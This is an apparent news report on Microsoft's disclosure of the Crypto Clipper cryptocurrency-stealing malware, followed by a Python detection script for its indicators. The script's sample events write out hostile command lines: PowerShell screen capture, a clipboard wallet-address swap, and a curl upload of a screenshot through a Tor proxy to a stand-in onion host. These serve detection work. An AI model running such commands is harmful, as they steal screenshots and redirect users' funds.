Microsoft has disclosed a new self-propagating malware family that steals cryptocurrency data, Ars Technica reports. The threat has been named Crypto Clipper.
The malware spreads via USB drives and monitors the clipboard for wallet addresses and seed phrases. Once it detects such data, Crypto Clipper takes five screenshots within ten seconds and sends them, together with the clipboard contents, to attacker-controlled servers. Microsoft believes the screenshots give the attackers additional context about what the user was doing at the time.
What sets this Trojan apart is that it uses neither a traditional installer nor openly exposed, IP-based command-and-control infrastructure. Instead it ships a portable Tor client and routes its traffic through a local SOCKS5 proxy. This lets the operators combine data theft with remote command execution, turning a financially motivated tool into a backdoor.
Microsoft's researchers observed Crypto Clipper being distributed through .lnk shortcut files on USB drives that carry executable code. When the infected drive is connected and the shortcut is launched, this code checks whether the malware is already installed on the host; if not, it downloads it through the Tor proxy.
To hide its presence, the Trojan scans the USB drive and gives its .lnk files names that mimic files already on the drive. In addition, the malware replaces any wallet address it finds on the clipboard with one belonging to the attackers, so when the user pastes what they believe is the intended address into a transfer, the funds go to the attackers' wallet instead of the intended recipient. This is the classic clipper technique: the only reliable user-side check is to compare the pasted address against the intended one before confirming the transaction.
Microsoft Defender for Endpoint flags Crypto Clipper components as suspicious JavaScript processes and as possible data exfiltration via the curl utility. Microsoft Defender Antivirus detects the threat as Trojan:Win32/CryptoBandits.A. Among the common indicators of compromise, the company lists script interpreters launching suspicious child processes, use of a proxy on localhost:9050, screen-capture commands in PowerShell, and signs of clipboard inspection or cryptocurrency address substitution.
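Those indicators map directly onto process-creation telemetry (Sysmon Event ID 1 or an EDR's process events). The Python script below is an added example, not code from Microsoft's report or the Ars Technica article: it encodes each listed indicator as a regex over the command line and runs them over a handful of constructed events. The event records, file paths, the example.onion URL and the wallet address are all invented for the demonstration, and the rules are illustrative, not Defender's own detection logic.

```python
"""Triage process-creation events for the Crypto Clipper indicators Microsoft lists.

Added example: plain regexes over the command line, not Defender's own logic.
Every event below is constructed for the demonstration.
"""
import re
from typing import Dict, List

# Script hosts whose child processes the indicators call out.
SCRIPT_INTERPRETERS = {"wscript.exe", "cscript.exe", "mshta.exe",
                       "node.exe", "powershell.exe", "pwsh.exe"}

# (finding name, pattern applied to the lower-cased command line)
RULES = [
    # Tor's default SOCKS port: a client pointed at it, or Tor started on it
    ("tor_socks_proxy", re.compile(r"(localhost|127\.0\.0\.1):9050|socks5h?://|socksport\s+9050")),
    # curl with a proxy switch plus a body/upload switch: possible exfiltration
    ("curl_exfil", re.compile(r"\bcurl(\.exe)?\b.*(--socks5|--proxy|-x\s|--data|-d\s|--upload-file|-t\s)")),
    # .NET screen capture driven from PowerShell
    ("screen_capture", re.compile(r"copyfromscreen|system\.drawing\.bitmap")),
    # clipboard read/write from PowerShell cmdlets or WinForms
    ("clipboard_access", re.compile(r"get-clipboard|set-clipboard|clipboard\]::(get|set)text")),
]

# Address-shaped literals on a command line suggest a hard-coded attacker wallet.
# Matched against the original, case-sensitive command line (base58 is case-sensitive).
ADDRESS_PATTERNS = [
    ("hardcoded_btc_address", re.compile(r"\b(bc1[a-z0-9]{25,59}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\b")),
    ("hardcoded_eth_address", re.compile(r"\b0x[a-fA-F0-9]{40}\b")),
]


def analyze_event(ev: Dict[str, object]) -> List[str]:
    """Return the indicator names an event trips, in a stable order."""
    cmd = str(ev.get("cmdline", ""))
    findings: List[str] = []
    if str(ev.get("parent", "")).lower() in SCRIPT_INTERPRETERS:
        findings.append("script_interpreter_child")
    low = cmd.lower()
    findings += [name for name, rx in RULES if rx.search(low)]
    findings += [name for name, rx in ADDRESS_PATTERNS if rx.search(cmd)]
    return findings


def triage(events) -> Dict[int, List[str]]:
    """Map pid -> findings for every event that trips at least one indicator."""
    out: Dict[int, List[str]] = {}
    for ev in events:
        found = analyze_event(ev)
        if found:
            out[ev["pid"]] = found
    return out


FAKE_ETH = "0x" + "ab" * 20   # obviously fake 40-hex-char address for the demo

# Constructed sample events (not real telemetry), modelled on Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    # benign: an admin running PowerShell from Explorer
    {"pid": 100, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    # a script host starting a portable Tor client on the default SOCKS port
    {"pid": 101, "parent": "wscript.exe", "image": "tor.exe",
     "cmdline": r"tor.exe --SocksPort 9050 --DataDirectory C:\Users\Public\td"},
    # PowerShell screen capture via System.Drawing
    {"pid": 102, "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": ('powershell.exe -w hidden -c "Add-Type -AssemblyName System.Drawing; '
                 '$b=New-Object System.Drawing.Bitmap 1920,1080; '
                 '[System.Drawing.Graphics]::FromImage($b).CopyFromScreen(0,0,0,0,$b.Size); '
                 r"$b.Save('C:\Users\Public\shot1.png')" + '"')},
    # clipboard check followed by an address swap
    {"pid": 103, "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": ('powershell.exe -w hidden -c "$c=Get-Clipboard -Raw; '
                 "if($c -match '^0x[a-fA-F0-9]{40}$'){Set-Clipboard -Value '" + FAKE_ETH + "'}\"")},
    # curl pushing a screenshot through the local Tor SOCKS proxy
    {"pid": 104, "parent": "wscript.exe", "image": "curl.exe",
     "cmdline": ("curl.exe --socks5-hostname 127.0.0.1:9050 --data-binary "
                 r"@C:\Users\Public\shot1.png http://example.onion/upload")},
]

if __name__ == "__main__":
    for pid, found in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(found))
```

The benign event trips nothing; each of the others trips the script-host parent check plus the indicator it was built around, which is the point: no single rule is conclusive (admins do run curl and PowerShell), but a script interpreter spawning a child that talks to localhost:9050, captures the screen or touches the clipboard is worth an analyst's attention.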
Microsoft said this Trojan family shows how lightweight scripting tools can have an outsized impact once combined with anonymized communication channels and the ability to run tasks in real time. Tor routing, targeted clipboard interception, screenshot capture and remote command execution together give the attackers both a quick path to monetization and long-term control over infected devices.